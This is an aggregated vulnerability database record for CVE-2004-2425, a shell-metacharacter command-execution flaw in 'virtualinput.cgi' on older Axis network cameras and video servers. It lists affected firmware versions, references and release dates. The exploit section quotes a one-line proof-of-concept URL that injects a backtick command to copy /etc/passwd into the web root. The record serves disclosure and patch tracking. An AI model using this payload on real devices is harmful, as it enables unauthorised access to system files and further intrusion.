ID

VAR-E-200408-0043


CVE

cve_id:CVE-2004-2425

Trust: 1.6

sources: EXPLOIT-DB: 24400 // EDBNET: 46534

EDB ID

24400


TITLE

Axis Network Camera 2.x And Video Server 1-3 - 'virtualinput.cgi' Arbitrary Command Execution - CGI webapps Exploit

Trust: 0.6

sources: EXPLOIT-DB: 24400

DESCRIPTION

Axis Network Camera 2.x And Video Server 1-3 - 'virtualinput.cgi' Arbitrary Command Execution. CVE-2004-2425CVE-9121 . webapps exploit for CGI platform

Trust: 0.6

sources: EXPLOIT-DB: 24400

AFFECTED PRODUCTS

vendor:axismodel:network camera and video serverscope:eqversion:2.x1-3

Trust: 1.6

vendor:axismodel:communications video serverscope:eqversion:24113.12

Trust: 0.6

vendor:axismodel:communications video serverscope:eqversion:2401+3.12

Trust: 0.6

vendor:axismodel:communications storpoint cdscope: - version: -

Trust: 0.3

vendor:axismodel:communications serial serverscope:eqversion:2490

Trust: 0.3

vendor:axismodel:communications network dvrscope:eqversion:2460

Trust: 0.3

vendor:axismodel:communications mpeg-2 video server 250sscope: - version: -

Trust: 0.3

vendor:axismodel:communications 250s video serverscope:eqversion:3.03

Trust: 0.3

vendor:axismodel:communications 250s mpeg-2 video serverscope:eqversion:3.10

Trust: 0.3

vendor:axismodel:communications serial serverscope:eqversion:24902.11.3

Trust: 0.3

vendor:axismodel:communications network dvrscope:eqversion:24603.11

Trust: 0.3

vendor:axismodel:communications network dvrscope:eqversion:24603.10

Trust: 0.3

vendor:axismodel:communications video serverscope:eqversion:24202.34

Trust: 0.3

vendor:axismodel:communications video serverscope:eqversion:24202.32

Trust: 0.3

vendor:axismodel:communications network camerascope:eqversion:24202.41

Trust: 0.3

vendor:axismodel:communications network camerascope:eqversion:24202.40

Trust: 0.3

vendor:axismodel:communications network camerascope:eqversion:24202.34

Trust: 0.3

vendor:axismodel:communications network camerascope:eqversion:24202.33

Trust: 0.3

vendor:axismodel:communications network camerascope:eqversion:24202.32

Trust: 0.3

vendor:axismodel:communications network camerascope:eqversion:24202.31

Trust: 0.3

vendor:axismodel:communications network camerascope:eqversion:24202.30

Trust: 0.3

vendor:axismodel:communications network camerascope:eqversion:24202.12

Trust: 0.3

vendor:axismodel:communications video serverscope:eqversion:24113.13

Trust: 0.3

vendor:axismodel:communications video serverscope:eqversion:2401+3.13

Trust: 0.3

vendor:axismodel:communications blade video serverscope:eqversion:2401+3.12

Trust: 0.3

vendor:axismodel:communications video serverscope:eqversion:24012.34

Trust: 0.3

vendor:axismodel:communications video serverscope:eqversion:24012.33

Trust: 0.3

vendor:axismodel:communications video serverscope:eqversion:24012.32

Trust: 0.3

vendor:axismodel:communications video serverscope:eqversion:24012.31

Trust: 0.3

vendor:axismodel:communications video serverscope:eqversion:24012.30

Trust: 0.3

vendor:axismodel:communications video serverscope:eqversion:24012.20

Trust: 0.3

vendor:axismodel:communications video serverscope:eqversion:24011.15

Trust: 0.3

vendor:axismodel:communications video serverscope:eqversion:24011.01

Trust: 0.3

vendor:axismodel:communications video serverscope:eqversion:2400+3.12

Trust: 0.3

vendor:axismodel:communications video serverscope:eqversion:2400+3.11

Trust: 0.3

vendor:axismodel:communications blade video serverscope:eqversion:2400+3.12

Trust: 0.3

vendor:axismodel:communications video serverscope:eqversion:24002.34

Trust: 0.3

vendor:axismodel:communications video serverscope:eqversion:24002.33

Trust: 0.3

vendor:axismodel:communications video serverscope:eqversion:24002.32

Trust: 0.3

vendor:axismodel:communications video serverscope:eqversion:24002.31

Trust: 0.3

vendor:axismodel:communications video serverscope:eqversion:24002.30

Trust: 0.3

vendor:axismodel:communications video serverscope:eqversion:24002.20

Trust: 0.3

vendor:axismodel:communications video serverscope:eqversion:24002.0

Trust: 0.3

vendor:axismodel:communications video serverscope:eqversion:24001.15

Trust: 0.3

vendor:axismodel:communications video serverscope:eqversion:24001.12

Trust: 0.3

vendor:axismodel:communications video serverscope:eqversion:24001.11

Trust: 0.3

vendor:axismodel:communications video serverscope:eqversion:24001.10

Trust: 0.3

vendor:axismodel:communications video serverscope:eqversion:24001.02

Trust: 0.3

vendor:axismodel:communications video serverscope:eqversion:24001.01

Trust: 0.3

vendor:axismodel:communications mpeg-2 video serverscope:eqversion:2303.11

Trust: 0.3

vendor:axismodel:communications ptz network camerascope:eqversion:21302.40

Trust: 0.3

vendor:axismodel:communications ptz network camerascope:eqversion:21302.34

Trust: 0.3

vendor:axismodel:communications ptz network camerascope:eqversion:21302.32

Trust: 0.3

vendor:axismodel:communications ptz network camerascope:eqversion:21302.31

Trust: 0.3

vendor:axismodel:communications ptz network camerascope:eqversion:21302.30

Trust: 0.3

vendor:axismodel:communications network camerascope:eqversion:21202.41

Trust: 0.3

vendor:axismodel:communications network camerascope:eqversion:21202.40

Trust: 0.3

vendor:axismodel:communications network camerascope:eqversion:21202.34

Trust: 0.3

vendor:axismodel:communications network camerascope:eqversion:21202.32

Trust: 0.3

vendor:axismodel:communications network camerascope:eqversion:21202.31

Trust: 0.3

vendor:axismodel:communications network camerascope:eqversion:21202.30

Trust: 0.3

vendor:axismodel:communications network camerascope:eqversion:21202.12

Trust: 0.3

vendor:axismodel:communications network camerascope:eqversion:21102.41

Trust: 0.3

vendor:axismodel:communications network camerascope:eqversion:21102.40

Trust: 0.3

vendor:axismodel:communications network camerascope:eqversion:21102.34

Trust: 0.3

vendor:axismodel:communications network camerascope:eqversion:21102.32

Trust: 0.3

vendor:axismodel:communications network camerascope:eqversion:21102.31

Trust: 0.3

vendor:axismodel:communications network camerascope:eqversion:21102.30

Trust: 0.3

vendor:axismodel:communications network camerascope:eqversion:21102.12

Trust: 0.3

vendor:axismodel:communications network camerascope:eqversion:21002.41

Trust: 0.3

vendor:axismodel:communications network camerascope:eqversion:21002.40

Trust: 0.3

vendor:axismodel:communications network camerascope:eqversion:21002.34

Trust: 0.3

vendor:axismodel:communications network camerascope:eqversion:21002.33

Trust: 0.3

vendor:axismodel:communications network camerascope:eqversion:21002.32

Trust: 0.3

vendor:axismodel:communications network camerascope:eqversion:21002.31

Trust: 0.3

vendor:axismodel:communications network camerascope:eqversion:21002.30

Trust: 0.3

vendor:axismodel:communications network camerascope:eqversion:21002.12

Trust: 0.3

vendor:axismodel:communications 250s mpeg-2 video serverscope:neversion:3.20

Trust: 0.3

vendor:axismodel:communications digital video recorderscope:neversion:24603.13

Trust: 0.3

vendor:axismodel:communications network camerascope:neversion:24202.42

Trust: 0.3

vendor:axismodel:communications video serverscope:neversion:24113.13

Trust: 0.3

vendor:axismodel:communications video serverscope:neversion:2401+3.13

Trust: 0.3

vendor:axismodel:communications blade video serverscope:neversion:2401+3.13

Trust: 0.3

vendor:axismodel:communications video serverscope:neversion:24012.34.1

Trust: 0.3

vendor:axismodel:communications video serverscope:neversion:2400+3.13

Trust: 0.3

vendor:axismodel:communications blade video serverscope:neversion:2400+3.13

Trust: 0.3

vendor:axismodel:communications video serverscope:neversion:24002.34.1

Trust: 0.3

vendor:axismodel:communications mpeg-2 video serverscope:neversion:2303.20

Trust: 0.3

vendor:axismodel:communications network camerascope:neversion:21302.42

Trust: 0.3

vendor:axismodel:communications network camerascope:neversion:21202.42

Trust: 0.3

vendor:axismodel:communications network camerascope:neversion:21102.42

Trust: 0.3

vendor:axismodel:communications network camerascope:neversion:21002.42

Trust: 0.3

sources: BID: 11011 // EXPLOIT-DB: 24400 // EDBNET: 46534

EXPLOIT

source: https://www.securityfocus.com/bid/11011/info

1. A shell metacharacter command-execution vulnerability allows an anonymous user to download the contents of the '/etc/passwd' file on the device. Other commands are also likely to work, facilitating other attacks.

This issue is reported to affect:
- Axis 2100, 2110, 2120, 2420 network cameras with firmware versions 2.34 thru 2.40
- Axis 2130 network cameras
- Axis 2401 and 2401 video servers

http://www.example.com/axis-cgi/io/virtualinput.cgi?\x60cat</etc/passwd>/mnt/flash/etc/httpd/html/passwd\x60

Trust: 1.0

sources: EXPLOIT-DB: 24400

EXPLOIT LANGUAGE

txt

Trust: 0.6

sources: EXPLOIT-DB: 24400

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 24400

TYPE

'virtualinput.cgi' Arbitrary Command Execution

Trust: 1.0

sources: EXPLOIT-DB: 24400

CREDITS

bashis

Trust: 0.6

sources: EXPLOIT-DB: 24400

EXTERNAL IDS

db:EXPLOIT-DBid:24400

Trust: 1.9

db:BIDid:11011

Trust: 1.9

db:NVDid:CVE-2004-2425

Trust: 1.6

db:EDBNETid:46534

Trust: 0.6

sources: BID: 11011 // EXPLOIT-DB: 24400 // EDBNET: 46534

REFERENCES

url:https://nvd.nist.gov/vuln/detail/cve-2004-2425

Trust: 1.6

url:https://www.securityfocus.com/bid/11011/info

Trust: 1.0

url:https://www.exploit-db.com/exploits/24400/

Trust: 0.6

url:https://www.exploit-db.com/exploits/24402

Trust: 0.3

url:http://www.axis.com/products/camera_servers/index.htm

Trust: 0.3

url:https://www.exploit-db.com/exploits/24401

Trust: 0.3

url:https://www.exploit-db.com/exploits/24400

Trust: 0.3

sources: BID: 11011 // EXPLOIT-DB: 24400 // EDBNET: 46534

SOURCES

db:BIDid:11011
db:EXPLOIT-DBid:24400
db:EDBNETid:46534

LAST UPDATE DATE

2022-07-27T09:44:13.492000+00:00


SOURCES UPDATE DATE

db:BIDid:11011date:2007-02-06T20:08:00

SOURCES RELEASE DATE

db:BIDid:11011date:2004-08-23T00:00:00
db:EXPLOIT-DBid:24400date:2004-08-23T00:00:00
db:EDBNETid:46534date:2004-08-23T00:00:00